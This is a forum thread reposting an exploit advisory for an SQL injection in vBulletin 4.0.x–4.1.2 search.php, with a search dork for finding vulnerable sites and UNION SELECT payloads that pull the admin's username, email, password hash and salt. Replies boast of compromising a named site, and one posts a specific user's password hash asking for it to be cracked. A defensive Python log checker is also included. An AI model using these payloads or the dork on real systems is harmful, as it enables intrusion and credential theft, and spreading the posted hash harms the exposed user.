Nytro

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

Posted

====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================

Source: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r

It has been public (thanks "d") for some time, but I see it is now showing up on exploit-db as well.

Video Demonstration by TinK:
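For defenders reviewing logged search.php POST bodies, the check below flags `cat[]` values that are not plain integers, which is the parameter the advisory names. It is an added example, not part of the original post or of vBulletin's code; the 10-digit limit on a category id and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter named in the advisory: cat[0], cat[1], ... (cat[] with no index too).
CAT_KEY = re.compile(r"cat\[[0-9]*\]")
# Assumption of this example: a category id is a short unsigned integer.
CAT_VALUE = re.compile(r"[0-9]{1,10}")


def suspicious_cat_params(post_body):
    """Return (key, value) pairs whose cat[] value is not a plain integer."""
    hits = []
    # parse_qsl URL-decodes keys and values, so cat%5B0%5D is seen as cat[0].
    # keep_blank_values makes an empty cat[0]= visible instead of dropped.
    for key, value in parse_qsl(post_body, keep_blank_values=True):
        if CAT_KEY.fullmatch(key) and not CAT_VALUE.fullmatch(value):
            hits.append((key, value))
    return hits


def flag_requests(bodies):
    """Return the indexes of logged request bodies that need review."""
    return [i for i, body in enumerate(bodies) if suspicious_cat_params(body)]


# Constructed sample bodies (not real traffic).
SAMPLE_BODIES = [
    # Normal multi-category search: every cat[] value is an integer.
    "query=test&search_type=1&cat[0]=1&cat[1]=7",
    # URL-encoded form of the first payload shown in the advisory.
    "query=test&cat%5B0%5D=1%29+UNION+SELECT+database%28%29%23",
    # Non-numeric suffix on an otherwise numeric id.
    "query=x&cat[]=12abc",
    # Unrelated parameter that merely contains SQL-looking text.
    "query=union+select&search_type=1",
]

if __name__ == "__main__":
    for idx in flag_requests(SAMPLE_BODIES):
        print(idx, suspicious_cat_params(SAMPLE_BODIES[idx]))
```

The same integer-only rule, applied on the server before the ids reach the query, is the input validation this parameter needs on installs that cannot yet move to the patched release.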

Posted

Man, these guys just can't stop themselves from trying to get famous :( they ruined a perfectly good exploit. I have never understood these people who want to publish everything, and in the vast majority of cases it isn't even their own.

Posted (edited)

Here is a short demonstration I did on alphazone.ro a month ago: Alphazone Pwned on Vimeo

@paul4games: no, he is not the one who found the vulnerability. The guy who posted it on 1337day and exploit-db is a skid from hackforums named majidemo.

Edited by xpaulx
  • Upvote 1
Posted (edited)

You can't take the database like that; only after you get hold of the admin's username and password, and only then can you steal it.

edit: can anyone manage to find the password?

Leonight : d4644b1f0c83a6686f47cf67215c4fa6

Edited by marcus21
